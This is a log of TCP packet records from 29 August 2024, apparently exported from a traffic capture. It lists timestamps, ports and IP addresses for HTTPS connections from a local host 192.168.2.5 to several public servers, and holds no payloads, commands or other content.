                                                                          Aug 29, 2024 17:12:17.001096964 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:17.001144886 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:17.001151085 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:17.001236916 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:17.003144979 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:17.268798113 CEST53744443192.168.2.5172.67.41.60
                                                                          Aug 29, 2024 17:12:17.268834114 CEST44353744172.67.41.60192.168.2.5
                                                                          Aug 29, 2024 17:12:17.369261026 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:17.423418999 CEST53747443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:17.423449039 CEST44353747172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:17.423724890 CEST53747443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:17.424005985 CEST53747443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:17.424016953 CEST44353747172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:17.454509020 CEST53743443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:17.454515934 CEST44353743142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:17.482412100 CEST53749443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:17.482426882 CEST44353749172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:17.482474089 CEST53749443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:17.482574940 CEST53750443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:17.482580900 CEST44353750172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:17.482703924 CEST53750443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:17.482939005 CEST53749443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:17.482947111 CEST44353749172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:17.483261108 CEST53751443192.168.2.5216.58.206.38
                                                                          Aug 29, 2024 17:12:17.483268976 CEST44353751216.58.206.38192.168.2.5
                                                                          Aug 29, 2024 17:12:17.483366013 CEST53751443192.168.2.5216.58.206.38
                                                                          Aug 29, 2024 17:12:17.483531952 CEST53750443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:17.483537912 CEST44353750172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:17.483659029 CEST53751443192.168.2.5216.58.206.38
                                                                          Aug 29, 2024 17:12:17.483666897 CEST44353751216.58.206.38192.168.2.5
                                                                          Aug 29, 2024 17:12:17.962110043 CEST44353749172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:17.962730885 CEST53749443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:17.962758064 CEST44353749172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:17.963825941 CEST44353749172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:17.963882923 CEST53749443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:17.965699911 CEST53749443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:17.965780020 CEST44353749172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:17.966001034 CEST53749443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:17.966007948 CEST44353749172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:17.966159105 CEST44353750172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:17.966447115 CEST53750443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:17.966454029 CEST44353750172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:17.967528105 CEST44353750172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:17.967673063 CEST53750443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:17.968993902 CEST53750443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:17.969053984 CEST44353750172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:17.969208956 CEST53750443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:17.969213963 CEST44353750172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:18.059751987 CEST53750443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:18.064174891 CEST44353747172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:18.067132950 CEST53752443192.168.2.5172.67.41.60
                                                                          Aug 29, 2024 17:12:18.067168951 CEST44353752172.67.41.60192.168.2.5
                                                                          Aug 29, 2024 17:12:18.067295074 CEST53752443192.168.2.5172.67.41.60
                                                                          Aug 29, 2024 17:12:18.067625046 CEST53747443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:18.067636967 CEST44353747172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:18.068020105 CEST53752443192.168.2.5172.67.41.60
                                                                          Aug 29, 2024 17:12:18.068032980 CEST44353752172.67.41.60192.168.2.5
                                                                          Aug 29, 2024 17:12:19.215709925 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.215720892 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.220177889 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.220626116 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.220633030 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.224286079 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.224353075 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.224359989 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.228806019 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.228848934 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.228854895 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.233535051 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.233591080 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.233596087 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.237008095 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.237096071 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.237102032 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.241302013 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.241362095 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.241367102 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.244988918 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.247129917 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.247134924 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.248658895 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.248701096 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.248708010 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.252985001 CEST53754443192.168.2.5216.58.206.68
                                                                          Aug 29, 2024 17:12:19.253420115 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.253462076 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.253467083 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.255320072 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.255368948 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.255373955 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.257353067 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.257416010 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.257422924 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.259634018 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.259690046 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.259696007 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.262031078 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.263164997 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.263170004 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.264255047 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.264285088 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.264307022 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.264312983 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.264549971 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.266562939 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.270133972 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.270169020 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.270201921 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.270210028 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.270584106 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.271203041 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.273435116 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.273514032 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.273540974 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.273545980 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.273636103 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.275814056 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.278021097 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.278058052 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.278075933 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.278081894 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.278121948 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.280287027 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.283016920 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.283054113 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.283061981 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.283068895 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.283118010 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.285176992 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.286042929 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.286094904 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.291574001 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.296664000 CEST53758443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:19.296701908 CEST4435375854.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:19.297110081 CEST53753443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:19.297122002 CEST44353753142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:19.297141075 CEST53758443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:19.298017979 CEST53758443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:19.298032045 CEST4435375854.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:19.315896034 CEST44353755172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:19.316394091 CEST53755443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:19.316406965 CEST44353755172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:19.316781998 CEST44353755172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:19.317079067 CEST53755443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:19.317167044 CEST44353755172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:19.317281008 CEST53755443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:19.326386929 CEST44353756172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:19.331031084 CEST53756443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:19.331043959 CEST44353756172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:19.331346989 CEST44353756172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:19.331897974 CEST53756443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:19.331959009 CEST44353756172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:19.332278013 CEST53756443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:19.364504099 CEST44353755172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:19.372509003 CEST44353756172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:19.466487885 CEST44353755172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:19.466564894 CEST44353755172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:19.466809988 CEST53755443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:19.470226049 CEST44353756172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:19.470276117 CEST44353756172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:19.470333099 CEST53756443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:19.768079042 CEST53756443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:19.768104076 CEST44353756172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:19.819813967 CEST53755443192.168.2.5172.67.69.19
                                                                          Aug 29, 2024 17:12:19.819840908 CEST44353755172.67.69.19192.168.2.5
                                                                          Aug 29, 2024 17:12:19.909301043 CEST4435375854.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:19.910734892 CEST53758443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:19.910794020 CEST4435375854.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:19.911737919 CEST4435375854.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:19.911813021 CEST53758443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:19.921103001 CEST53758443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:19.921166897 CEST4435375854.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:19.923583984 CEST53758443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:19.923599005 CEST4435375854.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:19.963509083 CEST53758443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:20.033173084 CEST4435375854.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:20.033221006 CEST4435375854.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:20.033278942 CEST53758443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:20.033699036 CEST53758443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:20.033719063 CEST4435375854.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:20.036298037 CEST53759443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:20.036345959 CEST4435375954.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:20.036416054 CEST53759443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:20.036627054 CEST53759443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:20.036638975 CEST4435375954.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:20.126331091 CEST53760443192.168.2.5184.28.90.27
                                                                          Aug 29, 2024 17:12:20.126368999 CEST44353760184.28.90.27192.168.2.5
                                                                          Aug 29, 2024 17:12:20.126451015 CEST53760443192.168.2.5184.28.90.27
                                                                          Aug 29, 2024 17:12:20.131705999 CEST53760443192.168.2.5184.28.90.27
                                                                          Aug 29, 2024 17:12:20.131721020 CEST44353760184.28.90.27192.168.2.5
                                                                          Aug 29, 2024 17:12:20.464767933 CEST53762443192.168.2.5104.26.2.70
                                                                          Aug 29, 2024 17:12:20.464801073 CEST44353762104.26.2.70192.168.2.5
                                                                          Aug 29, 2024 17:12:20.464935064 CEST53762443192.168.2.5104.26.2.70
                                                                          Aug 29, 2024 17:12:20.465051889 CEST53763443192.168.2.5104.26.2.70
                                                                          Aug 29, 2024 17:12:20.465084076 CEST44353763104.26.2.70192.168.2.5
                                                                          Aug 29, 2024 17:12:20.465174913 CEST53763443192.168.2.5104.26.2.70
                                                                          Aug 29, 2024 17:12:20.465377092 CEST53763443192.168.2.5104.26.2.70
                                                                          Aug 29, 2024 17:12:20.465390921 CEST44353763104.26.2.70192.168.2.5
                                                                          Aug 29, 2024 17:12:20.465642929 CEST53762443192.168.2.5104.26.2.70
                                                                          Aug 29, 2024 17:12:20.465657949 CEST44353762104.26.2.70192.168.2.5
                                                                          Aug 29, 2024 17:12:20.467081070 CEST53764443192.168.2.5142.250.186.166
                                                                          Aug 29, 2024 17:12:20.467109919 CEST44353764142.250.186.166192.168.2.5
                                                                          Aug 29, 2024 17:12:20.467171907 CEST53764443192.168.2.5142.250.186.166
                                                                          Aug 29, 2024 17:12:20.467324972 CEST53764443192.168.2.5142.250.186.166
                                                                          Aug 29, 2024 17:12:20.467338085 CEST44353764142.250.186.166192.168.2.5
                                                                          Aug 29, 2024 17:12:20.486043930 CEST53765443192.168.2.5104.26.2.70
                                                                          Aug 29, 2024 17:12:20.486054897 CEST44353765104.26.2.70192.168.2.5
                                                                          Aug 29, 2024 17:12:20.486433029 CEST53765443192.168.2.5104.26.2.70
                                                                          Aug 29, 2024 17:12:20.486613989 CEST53765443192.168.2.5104.26.2.70
                                                                          Aug 29, 2024 17:12:20.486624956 CEST44353765104.26.2.70192.168.2.5
                                                                          Aug 29, 2024 17:12:20.533552885 CEST4435375954.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:20.534600973 CEST53759443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:20.534611940 CEST4435375954.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:20.535434008 CEST4435375954.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:20.535737991 CEST53759443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:20.535974026 CEST4435375954.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:20.536062956 CEST53759443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:20.576508045 CEST4435375954.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:20.666785002 CEST4435375954.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:20.666867018 CEST4435375954.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:20.666909933 CEST53759443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:20.668704987 CEST53759443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:20.668724060 CEST4435375954.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:20.771044970 CEST44353760184.28.90.27192.168.2.5
                                                                          Aug 29, 2024 17:12:20.771153927 CEST53760443192.168.2.5184.28.90.27
                                                                          Aug 29, 2024 17:12:20.900108099 CEST53760443192.168.2.5184.28.90.27
                                                                          Aug 29, 2024 17:12:20.900126934 CEST44353760184.28.90.27192.168.2.5
                                                                          Aug 29, 2024 17:12:20.900372982 CEST44353760184.28.90.27192.168.2.5
                                                                          Aug 29, 2024 17:12:20.908750057 CEST53769443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:20.908797026 CEST44353769142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:20.908857107 CEST53769443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:20.909252882 CEST53769443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:20.909265995 CEST44353769142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:20.916409016 CEST44353763104.26.2.70192.168.2.5
                                                                          Aug 29, 2024 17:12:20.916699886 CEST53763443192.168.2.5104.26.2.70
                                                                          Aug 29, 2024 17:12:20.916707039 CEST44353763104.26.2.70192.168.2.5
                                                                          Aug 29, 2024 17:12:20.917747021 CEST44353763104.26.2.70192.168.2.5
                                                                          Aug 29, 2024 17:12:20.917803049 CEST53763443192.168.2.5104.26.2.70
                                                                          Aug 29, 2024 17:12:20.919363022 CEST53763443192.168.2.5104.26.2.70
                                                                          Aug 29, 2024 17:12:20.919424057 CEST44353763104.26.2.70192.168.2.5
                                                                          Aug 29, 2024 17:12:20.919765949 CEST53763443192.168.2.5104.26.2.70
                                                                          Aug 29, 2024 17:12:20.919771910 CEST44353763104.26.2.70192.168.2.5
                                                                          Aug 29, 2024 17:12:20.920897961 CEST44353762104.26.2.70192.168.2.5
                                                                          Aug 29, 2024 17:12:20.921161890 CEST53762443192.168.2.5104.26.2.70
                                                                          Aug 29, 2024 17:12:20.921179056 CEST44353762104.26.2.70192.168.2.5
                                                                          Aug 29, 2024 17:12:20.922046900 CEST44353762104.26.2.70192.168.2.5
                                                                          Aug 29, 2024 17:12:20.922096014 CEST53762443192.168.2.5104.26.2.70
                                                                          Aug 29, 2024 17:12:20.922558069 CEST53762443192.168.2.5104.26.2.70
                                                                          Aug 29, 2024 17:12:20.922610998 CEST44353762104.26.2.70192.168.2.5
                                                                          Aug 29, 2024 17:12:20.922919989 CEST53762443192.168.2.5104.26.2.70
                                                                          Aug 29, 2024 17:12:20.922928095 CEST44353762104.26.2.70192.168.2.5
                                                                          Aug 29, 2024 17:12:20.954030037 CEST44353765104.26.2.70192.168.2.5
                                                                          Aug 29, 2024 17:12:23.348463058 CEST53780443192.168.2.5142.250.186.161
                                                                          Aug 29, 2024 17:12:23.348469973 CEST44353780142.250.186.161192.168.2.5
                                                                          Aug 29, 2024 17:12:23.350073099 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.350126982 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.350135088 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.353822947 CEST44353779142.250.186.161192.168.2.5
                                                                          Aug 29, 2024 17:12:23.353827000 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.353883028 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.353893042 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.354104996 CEST53779443192.168.2.5142.250.186.161
                                                                          Aug 29, 2024 17:12:23.354124069 CEST44353779142.250.186.161192.168.2.5
                                                                          Aug 29, 2024 17:12:23.354506016 CEST44353779142.250.186.161192.168.2.5
                                                                          Aug 29, 2024 17:12:23.354517937 CEST44353779142.250.186.161192.168.2.5
                                                                          Aug 29, 2024 17:12:23.354568005 CEST53779443192.168.2.5142.250.186.161
                                                                          Aug 29, 2024 17:12:23.354574919 CEST44353779142.250.186.161192.168.2.5
                                                                          Aug 29, 2024 17:12:23.354788065 CEST53779443192.168.2.5142.250.186.161
                                                                          Aug 29, 2024 17:12:23.355248928 CEST44353779142.250.186.161192.168.2.5
                                                                          Aug 29, 2024 17:12:23.355525017 CEST53779443192.168.2.5142.250.186.161
                                                                          Aug 29, 2024 17:12:23.355587959 CEST44353779142.250.186.161192.168.2.5
                                                                          Aug 29, 2024 17:12:23.355710030 CEST53779443192.168.2.5142.250.186.161
                                                                          Aug 29, 2024 17:12:23.355715990 CEST44353779142.250.186.161192.168.2.5
                                                                          Aug 29, 2024 17:12:23.359895945 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.360008955 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.360017061 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.365797997 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.365855932 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.365861893 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.374172926 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.374209881 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.374253988 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.374265909 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.374305964 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.377672911 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.395883083 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.395909071 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.395929098 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.395936012 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.395987988 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.397193909 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.402637959 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.402664900 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.402683020 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.402690887 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.402729988 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.411170006 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.417045116 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.417110920 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.417119026 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.422638893 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.422700882 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.422708035 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.428545952 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.428594112 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.428601980 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.433880091 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.433924913 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.433932066 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.437684059 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.437721014 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.437735081 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.437747002 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.437947035 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.444566965 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.450692892 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.450716019 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.450753927 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.450764894 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.450805902 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.458841085 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.463263035 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.463296890 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.463309050 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.463319063 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.463464022 CEST53780443192.168.2.5142.250.186.161
